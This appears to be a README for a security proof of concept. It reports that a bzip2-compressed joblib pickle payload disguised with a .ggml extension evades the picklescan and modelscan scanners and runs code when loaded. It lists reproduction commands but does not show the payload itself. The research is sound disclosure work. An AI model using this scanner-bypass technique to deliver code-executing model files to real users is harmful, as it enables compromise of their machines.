Views
No views yet
.ggml)
Bypass: picklescan 1.0.4 + modelscan 0.8.8
Modes bypassed: all 4 (direct + directory scan for both scanners)
RCE via: joblib.load('malicious.ggml')
Technique: bzip2-compressed joblib payload
Tested: 2026-06-25malicious.ggml — bzip2-compressed joblib payload with .ggml extensionpoc-ggml.py — reproduction scriptREADME.md — this file1pip install picklescan modelscan joblib
2
3python3 poc-ggml.py
4
5picklescan -p malicious.ggml
6picklescan -p .
7modelscan -p malicious.ggml
8modelscan -p .
9
10python3 -c "
11import joblib
12print('--- BEFORE LOAD ---')
13joblib.load('malicious.ggml')
14print('--- AFTER LOAD ---')
15"